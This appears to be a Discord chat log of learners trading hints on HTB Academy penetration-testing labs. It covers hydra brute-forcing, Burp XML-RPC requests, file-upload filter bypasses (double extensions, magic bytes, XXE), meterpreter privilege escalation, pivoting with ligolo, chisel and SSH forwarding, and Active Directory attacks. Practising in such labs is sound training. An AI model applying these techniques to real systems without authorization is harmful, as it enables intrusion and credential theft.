I appreciate you helping me win the war against my own mind. XD

storm pewter
#

.

torn steppe
#

@misty mural 😄 no problem, imagine my face when I was taking the wrong IP in the first host... Same feeling XD

rustic sage
# misty mural https://tenor.com/view/facepalm-annoyed-st%C3%B6hn-oh-no-oh-nein-gif-24943313

I understand. I thought I had to make more searches on nmap parameters to answer the module's final question using -p- . The problem for this module is : if the spawnmachine has his top TCP open port out of the range of the default values for -Pn, it will be impossible to find it due to the fact that -p- is too long to run. Because when asking to do a full TCP scan... aren't we supposed to scan all port (-p-) ....? Anyway ... I'm now going to next module ... 😀 Thx for helping @misty mural @torn steppe @fathom pendant @proud pine

tender lake
#

I am having a surprisingly hard time with Attacking Common services - FTP, I am stuck on the 2nd question where I need to enter the username that I have found.
I used Hydra and the 2 lists that was provided in this module and I got a successful response. But when I submit the username as an answer it does not work. And I can't connect to the ssh service as required in the last question with the username and password that hydra found.

hydra -L 'users.list' -P 'pws.list' ftp://IP -s PORT
[PORT][ftp] host: IP   login: j___   password: 3_______
.....
ssh j____@IP
 j____@IP: Permission denied (publickey).
torn steppe
#

I don't know but, maybe the mistake is that are you trying to login via ssh with a ftp credentials??

#

I dont reach this module yet but maybe the credentials are different between services and aplications

tender lake
#

The questions for that section

torn steppe
#

ahms

#

thx for the picture

tender lake
#

Yeah, this one is a bit weird. I tried to find the port with a -p- nmap scan but it didnt show up until the 4th reset

torn steppe
#

what port is running ssh service?

tender lake
#

22, the standard one

solemn bronze
#

I need some help with server side attack module, skill assessment. It will be great help if someone could drop some solutions.

#

how to upload screenshots of the assessment ??

deep owl
#

hello all

#

AD Enumeration & Attacks - Skills Assessment Part II

#
  • 1 Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
#

i was able to get a meterpreter session and ran "getsystem" and found the answer to the question

#

but am not able to do hashdump to solve the next quistion

#
  • 1 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
#

did i approach the first question in a wrong way ? please give me hints i feel like am lost

abstract nova
#

**Firewall and IDS/IPS Evasion - Hard Lab **
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.

I found the port but not sure how to get the flag.

tender lake
fathom pendant
#

Connecting is the way to go

analog pewter
#

@fathom pendant how to get a role of HTB community contributor

vital adder
sand cedar
analog pewter
fresh pine
#

"Credential Hunting in Linux" - Password Attacks

I tried mutating the password without success when doing hydra. Any tips please? 🥺

acoustic owl
fresh pine
fresh pine
#

haha awesome thank you!

tender acorn
#

i found a bug

zinc marsh
#

yo for the people who are used to use ligolo

#

I just got access to this machine, to access to the ports listening

#

I just connect with agent and I add 10.129.142.228 to the route?

trail leaf
#

If you do an ip a, you should see the CIDR notation for the subnet, it's basically just that. Something along the lines of 10.129.142.0/24 in this case I think

#

Ligolo is a bit overkill here though, just do some local port forwarding with the -L flag in SSH

pulsar needle
#

I tried to bruteforce SSH with the password using the custom rule provided, however it didnt work for the user ||Kira||

cedar void
pulsar needle
tender acorn
zinc marsh
#

I just want access to the local ports

trail leaf
#

that's why I'm saying ligolo is overkill

zinc marsh
trail leaf
#

If you just need to access single ports on a remote machine, and there isn't a need to pivot further into the network, my go to is to SSH local port forward

trail leaf
#

ah that makes sense

#

You could upload a static copy of socat and use that, but yeah, I understand trying to use ligolo or chisel then if you really don't want to use anything else

zinc marsh
#

I was thinking if I could setup the proxy with ligolo

#

and connecting to it I could have access to the ports

#

but I did wget and the machine died lol I had to restart it

trail leaf
#

I think you should, and if not, pretty sure ligolo has an option to do some port redirection which is functionally the same as what I was saying

trail leaf
#

The ! by itself usually gets interpreted differently by the shell

zinc marsh
#

I will try it

cedar void
zinc marsh
#

the machine didn't crash now

#

I will try nmap now to check

trail leaf
# zinc marsh

probably DM at this point, feels like we're clogging up this channel :)

zinc marsh
cedar void
zinc marsh
cedar void
trail leaf
#

I can't see the module because I don't have it unlocked so I don't know what the correct password is 🙃

zinc marsh
#

u don't need rdp for that

#

but I don't know what the module teaches u

cedar void
#

*linux host

zinc marsh
#

check the ports open

#

but if I remember well when u have to login with rdp they tell 'RDP to IP with user "" and password "" '

trail leaf
#

I think it's an older module, so things might be different now

zinc marsh
trail leaf
#

This is the Active Directory LDAP module, the whole point is to work with LDAP

#

The xfreerdp command, as far as I know, is correct. If you are sure you need to use RDP, maybe try something else like Remmina? If that doesn't work, it could be possible that you're just supposed to query LDAP remotely, or maybe even sign in with winrm.

I haven't done this module, nor have I unlocked it, so I can't say for certain how they do or don't want you to do this.

zinc marsh
#

I got it with chisel

inner talon
#

hello, did you manage to figure it out?

cedar void
humble halo
#

Anyone have done The Corporate Osint : Cloud Storage Section. I need help for finding the bucket name of AWS that the site use

subtle flicker
#

Hey i'm practicing in the lab assessment in the pivoting module. Once i pivot on the third machine it start to be a bit confusing, and it's hard to keep the wires connected. Could someone give me a hand/advices on how to keep the flow ?

acoustic owl
old wren
#

I just want to say that I've been pointlessly stuck on this question for at least an hour, and it's a very bad question from which you learn almost nothing of value. That's it.

humble halo
ruby drum
#

on the nibbles challenge i get "sudo: no tty present and no askpass program specified" after modifying the monitor.sh file and running it, why?

trail leaf
#

You probably need to stabilize your shell, follow the instructions in the section. They walk you through exactly what to do.

trail leaf
thick granite
#

using Burp, send a POST request to the server on http://serverip:port/xmlrpc.php with below xml content
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Now create a Wordlist by collecting all the methods returned in the response and make a wordlist
Now use Burp intruder nad replace the system.listMethods with the wordlist and start the attack.
The resulting no. of possible method calls to your target is the answer.

humble halo
#

@acoustic owl Thanks!!!

quasi wave
#

hi i'm having some issues with last section of getting started module. I am clicking on the file upload button but its not letting me upload a file

#

I'm assuming its a file upload vulnerability much like nibbles earlier in the same section

#

"upload files and/or images" button does nothing

#

decrypting the password and logging in was not too difficult.

#

I mean it took a minute for me to realize it was a hash

#

but I totally get it

#

but when I don't get is whether or not the fact that the box I'm currently doing is right after nibbles in same section on academy is trying to trick me into thinking its also a file upload issue

#

because I'm looking at all of these hidden pages and I am starting to question if its purposely leading me towards file uploads when the real issue is something else

#

can someone help me out here?

astral inlet
#

hi there is it only possible to buy cubes with credit card and not with paypal ?

slender nymph
maiden spindle
#

Hydra doesn't update with apt. I went to the github and did the make install but it still doesn't work for smb. Does anyone know how to fix this?

fiery berry
fathom pendant
#

I believe PayPal is an option

#

But that sounds more like you should ask support on the website rather than discord

astral inlet
#

thx i did that a few mins ago 🙂

final maple
#

Can anyone help me with the initial foothold for the "Skills Assessment - File Upload Attacks" Module? I see the page html source code and have tried editing out the blacklist function, but I still can't upload anything other than .jpeg, .jpg, or .png. I've been able to get shell.php.jpg to upload, but I can't really do much from there. I've also tried fuzzing the parameters for LFI. When I fuzz for file extensions and file acceptance types, I get the same length code of 2044 for everything, so it is not really useful.

umbral wigeon
final maple
umbral wigeon
final maple
umbral wigeon
final maple
umbral wigeon
#

if you do look for the file, you will see that it actually contains the payload u sent

final maple
final maple
umbral wigeon
#

since u found in your initial enumeration that only .jpg .jpeg and .png are allowed, you can try to upload that format but change its contents to the xxe payload. Note that even though u edited the blacklist function in Firefox, but that is only client-side validation, you dont know what they are doing in the backend yet

final maple
umbral wigeon
final maple
coarse escarp
#

So I need some help

thorn urchin
#

on which module

coarse escarp
hazy grotto
#

having trouble with greenshot.

coarse escarp
#

I'm doing a post request on the web request module

coarse escarp
#

do I just need the session cookie?

hazy grotto
#

I thought there was a hotkey to make a selection of what to capture, then it would auto load the editor so that you can add red arrows and etc. I'm having the hardest time. I'm pushing prntscrn, selecting, then right clicking green arrow in the right bottom tray, and clicking capture last region, which opens up the editor but the selection is now in the wrong spot.

coarse escarp
#

hold on

#

got it

#

was litterally searching the wrong thing

misty elk
#

Any nudges for Attacking Common services(easy). I'm stuck on trying to upload the CVE exploit. Ended up getting this.

Date:Sun, 30 Jun 2023 01:46:33 GMT
Server: Core FTP HTTP Server
Accept-Ranges: bytes
Connection: Keep-Alive
Content-type: application/octet-stream
Content-length: 5
coarse escarp
#

I seem to have server connection issues

#

but everything else worked just fine for me until then

#

why

coarse escarp
#

it happened again with a new server

#

and I got plenty of time

thorn urchin
#

its A public docker instance

#

your internet could just be bad

#

¯_(ツ)_/¯

coarse escarp
#

so do I just have to wait till tomorrow and hope for a better terminal?

thorn urchin
#

happy now

#

not a better terminal, just keep trying

coarse escarp
#

I only have one terminal per day

#

I do plan on getting VIP soon

#

soooo hopefully I'll have a better experience meruwu

final maple
#

Anyone available to DM with me about Skills Assessment - File Upload Attacks? I've been stuck on it all day. Thanks!

final maple
#

I just saw the green upload button...FML LOL!!! If you don't use the green square with the upwards arrow icon to upload, you won't get the full POST Request...I was using the blue submit button before.

iron plaza
#

guys and gals got a question related to adding an exploit to msfconsole ... I am on the shells & payload skills assessment and saw the exploit in question on the target machine but when i try to add it ... it does not show in the msf search result ... did the same thing on my own host and it worked fine so need to find out is something missing at my end or is this a tech issue

tranquil axle
#

I couldn’t see it via search but when I manually typed “use exploit/path/to/file/filename” I was able to use it without searching first

iron plaza
tranquil axle
#

It probably builds a cache for searching at some point and you have to refresh it if you add something afterwards

fathom pendant
#

Yes

iron plaza
final maple
#

Can anyone nudge me on the final part of Skills Assessment - File Upload? I have found the source code, file upload directory, and renaming scheme. I have uploaded a regular jpg file and found it at the website with the new file name. For my file name, I am using ||shell.pht.jpg|| and also ||image/jpg||. I've been trying to add php code to the request, but so far have not gotten ?cmd=id to work. I've tried lots of Magic Bytes so far, including for jpg/jpeg.

iron plaza
#

Need a bit of clarification on crackmapexec ... I have tried crackmapexec rdp [target IP] -u [username] -p [password] and got false negative but when I try same credentials on xfreerdp /v: [target IP] /u: [username] /p: [password] it goes through ... why did I get false negative and how to overcome this?

misty current
#

I haven't used the rdp mode on cme much, I wonder if it supports the same thing for SMB like --local-auth.

iron plaza
iron plaza
iron plaza
misty current
#

I've had problems with rdp mode in the past too, part reason why I stopped using it.

rustic sage
#

Hi everyone, i a am new to htb and i am currently doing th get started module, i encounter an issue with msf. i try to exploit a vulnerability on the openssh service but i am asked to configure the 'session' parameter' however it seems i have no active session. i am using the VM provided by htb.
does anyone have a clue to help me solve this pb?

thorn urchin
#

session refers to shells caught with metasploit already using other exploits or means. Because the exploit you selected is for s windows local privilege escalation, so it routes through an existing shell on the victim to run.

rustic sage
#

thanks @thorn urchin when i search exploit openssh it is the only one proposed though 😥

thorn urchin
#

been awhile since Ive done the module, does it insist on an openssh vuln?

#

openssh has not had many remote exploits

rustic sage
#

it said to scan the services on open ports and for the target ip i was given i only had openssh on port 22. i am real beginner so i probably misunderstood something though.

thorn urchin
#

so that port corresponds with the service they want you to poke at

#

good thing you didnt exploit that ssh server!

#

the target is written as

HOST_IP:PORT
misty current
rustic sage
thorn urchin
#

that is your target

#

83.136.252.24 is the ip, 40135 is the port

rustic sage
#

then i dont understand where is the problem whith the nmap on that target that returns the result above ...
maybe i need to dig deeper in the subject before starting those exercises. thanks for trying to explain me though

thorn urchin
bold flume
#

hello

bold flume
#

i want help gyes

thorn urchin
rustic sage
bold flume
#

plz help

thorn urchin
bold flume
thorn urchin
#

so youre in the wrong place

#

academy module discussion only

bold flume
thorn urchin
#

And this channel is for academy modules

#

its not generic help

bold flume
#

where is channel for that

thorn urchin
thorn urchin
#

If ya read em, yad know

acoustic owl
# bold flume rude

this has nothing to do with being rude.
This channel is solely about the modules in the HTB Academy.

Kali Linux has its own Discord channel.

narrow solar
#

good morning friends, i am at AD Enumeration & Attacks - Skills Assessment Part II trying to get flag at SQL01, i have an empty sql database and the service have no access to the admin desktop, one of the 2 users we had to compromise is part of IT-MANAGERS group that has no privileges, SQL01 is vulnerable to printnightmare but cant do it because i need to have credentials, i am stuck for a day and would appreciate a hint

thorn urchin
narrow solar
#

i tried Execute Commands, Read Local Files, Capture Service Hash, Impersonate Existing Users with the sql and didnt work, i will try more, thanks 😊

fiery berry
#

you can just use the information shown in the dehashed output

#

tf? Sorry I'm not that good with short words 😅

obsidian crag
#

Hyy friends

#

What' s up

coarse escarp
#

I'm a little confused as to what it's asking

#

is it asking for the targets banner or the host banner?

#

I'm assuming the targets banner

#

but then

#

why is this answer wrong?

#

It's in simialer nature to this

proud pine
dawn parrot
#

module : Attacking Common Services - Hard
i found the creds of 2 users ||patric|| (having user priv) and ||julio|| (having admin priv) by impersonating ||john||. but I don't know what to do now
i tried impersonating ||simon|| with ||fiona||
i tried this credentials all over the places

coarse escarp
#

yeah

dawn parrot
#

also can't enable xp_cmdshell with ||julio|| or ||patric|| or even ||john||

polar skiff
#

hi, im stuck in footprinting pop3/imap What is the customized version of the POP3 server? i look to the existing forum and questions/anwsers but i still dont get it ... i got all the other but still stuck on this one

fathom pendant
#

Connect and enumerate

#

That's really all I can say...

polar skiff
#

i know is not the namp, i got the v9..... and i try it but no luck

fathom pendant
#

You're taught how to connect in the module

#

Sometimes Nmap doesn't give us all info

sly kelp
sly kelp
polar skiff
#

tnks

dawn parrot
#

@sly kelp got it from the local linked server

#

LOCAL.TEST.LINKED.SRV

sly kelp
#

You are on right path but you are missing something

subtle flicker
#

Hey guys it's possible to do multiple pivoting using the same tool like ligolo? I'm trying to do it in the pivoting assessment but it's giving me error. I've added routes and everything, but maybe it's not just possible and i'm losing time

#

I've reached the pivotwin10 machine (with user vfrank) and the next step would be take the domain controller. But when i try to run the agent the proxy pops errors

pulsar needle
#

No

#

Its like

burnt seal
#

Hey guys, Currently doing the whois module in academy. It appears that the whois info for telsa required for an answer is now hidden

#

Can anyone else confirm

#

What is the admin email contact for the tesla.com domain (also in-scope for the Tesla bug bounty program)?

fathom pendant
burnt seal
#

tried outside of command line and getting similar

fathom pendant
#

Sir

#

I dont mean to alarm you

burnt seal
#

I'm a fucking idiot

#

...

fathom pendant
#

Yep

#

Was it the "sir"

burnt seal
burnt seal
#

Legend

fathom pendant
#

It do be that way

trail leaf
#

It be like that sometimes

fathom pendant
#

As soon as I clicked on it

trail leaf
#

Same brainwaves

fathom pendant
#

Minor spelling mistake, argument invalidated completely

maiden spindle
#

Hey guys, I'm on Password Attacks Lab - Hard. I've got d**** pass but i can't seem to rdp with it. What am I missing?

fossil turret
#

I'm currently taking the Linux Fundamentals module and it's asking for the path to the htb-student's mail, so I type 'mail' and it says to install it but I couldn't do that because I don't know the administrator password in the instance. Am I going too deep in trying to hack the instance for root's password to install mail just to get the path or is the answer much simpler than that?

rustic sage
hushed mountain
fossil turret
gloomy bramble
#

I think I have the flag now from txt details for Attacking Common Services Attacking DNS. The module is not acceptting it. format is "HTB(......)" I put with and without "'s, neither works. Anyone that can correct me?

rustic sage
#

i try solve this

trail leaf
#

If you’ve found the flag, you should be able to copy and paste it as is

gloomy bramble
cunning prairie
trail leaf
#

DM me a screenshot, not at my computer to verify character by character, but I think i can stull help

deep owl
#

hello all

#

AD Enumeration & Attacks - Skills Assessment Part II

#
  • 1 Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
cunning prairie
deep owl
#

i know that i have to check bloodhound since it is for checking rights of users

#

but when am running sharphound at MS01 as administrator user am facing errors

#

and when i ran sharphound on attacker machine am not able to see any users or don't know how

cunning prairie
deep owl
#

any hints on how to find users that have genericall and are part of domain admins group ..... am terrible at bloodhound

gloomy bramble
maiden spindle
#

@cunning prairie So I'm supposed to be able to rdp into it? I've currently got a powershell for D**** running but I'm finding nothing LaZagne turns up nothing and I can't lsass dump or sam since I'm not admin

rustic sage
keen oasis
#

It is 19 characters not 20

cunning prairie
#

Look at another protocol.

deep owl
maiden spindle
#

okay thnks

#

got tunnel vision

cunning prairie
inner sand
#

hey guys

#

so I am willing to give the OSCP Exam a Shot

#

and i was wondering if i can setup a similar lab of the offsec online labs on my computer